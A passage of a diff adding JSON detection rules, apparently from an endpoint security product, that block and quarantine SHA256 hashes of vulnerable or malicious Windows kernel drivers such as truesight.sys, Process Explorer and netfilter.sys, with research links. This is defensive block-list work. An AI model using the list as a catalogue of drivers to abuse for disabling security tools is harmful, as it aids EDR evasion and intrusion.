+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd78fe86-180b-54d3-b29d-86852105f255",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152468Z",
+ "creation_date": "2026-03-23T11:45:31.152471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa8ef041d0fb7efdd210f1dc6da700c60d50b409e35487d7eb424ce333eb9eb4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd9ab9b7-498b-5ced-b001-98f3704ae3bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605322Z",
+ "creation_date": "2026-03-23T11:45:29.605324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c52fdfb39d93de37a489e8899d01ef665d350d59c8b444eb88a9258bca7ec18",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd9e6959-642d-5ef9-87d2-a210100da481",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472467Z",
+ "creation_date": "2026-03-23T11:45:31.472471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d40656cff5214074ff468ec3b57c6f25dcf90d39cdf242349dddd76cb27de1ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bda89e75-e6fb-5adf-920a-1352f52c4fed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815974Z",
+ "creation_date": "2026-03-23T11:45:30.815976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815982Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52478f3ddd3d0b9eb098e66049d132cc5c7e05720bfc78b6550ce5a40306d993",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bda8cb6a-1d3b-50d6-8417-f6b3b90cd8b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976964Z",
+ "creation_date": "2026-03-23T11:45:29.976966Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2107b1c150e9c60630d4306fdcd8d47dd8918e912210066ef5fa551b30a6eb1c",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdacc102-ebf3-5b24-9bf8-49c1ce8dd07b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621016Z",
+ "creation_date": "2026-03-23T11:45:29.621018Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bc0cec99dce687304dad8f7a6daf772e695cbd0169d346d03ae12500361a1e8",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdc44806-78c8-58a1-817e-e82e03a57593",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480117Z",
+ "creation_date": "2026-03-23T11:45:30.480119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b78eb7f12ba718183313cf336655996756411b7dcc8648157aaa4c891ca9dbee",
+ "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdc77bc7-804d-5546-9ada-4968629588e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151143Z",
+ "creation_date": "2026-03-23T11:45:31.151145Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a0c8585a071d0a69c1db2c3817a7ebed2b3172620927673d43f4de5ae7fee1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdcc8ce2-a136-59fb-babd-ae32ca35154d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985045Z",
+ "creation_date": "2026-03-23T11:45:29.985047Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c786f3ca229da18b2806af4d57ecad603859ee548549b19f71a623f477fc740e",
+ "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdd2dd2a-b577-532c-9470-3c79ec661c51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815178Z",
+ "creation_date": "2026-03-23T11:45:31.815180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86fca8a2417289f6e57e965b57c77afc25a2e0238f7b15fa6749e36ccc8333ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bde7dd90-5d3b-5561-b0ac-8a365b8d330c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827769Z",
+ "creation_date": "2026-03-23T11:45:30.827771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827776Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81f31698797fd3e2be5c0122331c42df3158f40dcbd9badf42078371deceab13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdf0da74-9213-5a2d-a5cf-3f5b77847594",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819516Z",
+ "creation_date": "2026-03-23T11:45:31.819520Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9318ed6cf1c407c5766755322df3d11e268be558c1446c8b75d0e4da2ed05e08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdf23a90-d655-5493-ab5e-d083098e8b56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825633Z",
+ "creation_date": "2026-03-23T11:45:30.825635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1293155f307ac61973d7f0d05e7e22df5ee14d23ca9b63556f836186be8145a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdf38bea-f5f7-5f5a-8ab5-d20864bcd9cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617712Z",
+ "creation_date": "2026-03-23T11:45:29.617714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "626fae47811450d080d08c3d9fd890aa64bfecdc45eacd42a40850c1833c8763",
+ "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bdf42d1c-5ee2-529e-a411-0d07752d8d62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819354Z",
+ "creation_date": "2026-03-23T11:45:31.819356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cd55592a03556e29d89dbf5e3cc6db5e0aaab74ccba59cc467131843c01ea76",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be330886-88d8-587d-a166-2fba15218648",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457929Z",
+ "creation_date": "2026-03-23T11:45:30.457933Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "202d9703a5b8d06c5f92d2c5218a93431aa55af389007826a9bfaaf900812213",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be3531ac-e090-5a60-9200-ee929127bb23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975552Z",
+ "creation_date": "2026-03-23T11:45:29.975554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975559Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b50ffc60eaa4fb7429fdbb67c0aba0c7085f5129564d0a113fec231c5f8ff62e",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be62872f-9a8b-5c95-8aaf-6263eea69ab2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825441Z",
+ "creation_date": "2026-03-23T11:45:31.825443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b864ffab5fb7c53696543377bc03efc301c2ae33ff0314e2a2bf437f3c66faa6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be66222a-d7ab-543b-9ae7-038aba3f66cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967658Z",
+ "creation_date": "2026-03-23T11:45:29.967660Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967665Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34954e34f958648557a2cab18491f900183a1ef516949d681c20e11920a3117f",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be788b55-4e26-5d69-9526-d5dd88b97f08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474713Z",
+ "creation_date": "2026-03-23T11:45:31.474718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdc8ffee7073f1bcc9ebf768897a57b74a27011be1112420e09a0841eeba9530",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be7967db-75e9-57bb-aae7-a36f208017d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606540Z",
+ "creation_date": "2026-03-23T11:45:29.606542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c286dfac5ca413efeb1936e876688b6bd46d25dc64206f86efb4f52ad83d1889",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be846ef1-c5a5-5306-bb6f-4755a93c3a65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822727Z",
+ "creation_date": "2026-03-23T11:45:30.822730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6d91487921478891e5570663f23a473b1b0490f8cf75bdeb7ab00111999fb9b",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be8d3d00-f0ab-57b3-aa0b-4ba1c318f131",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
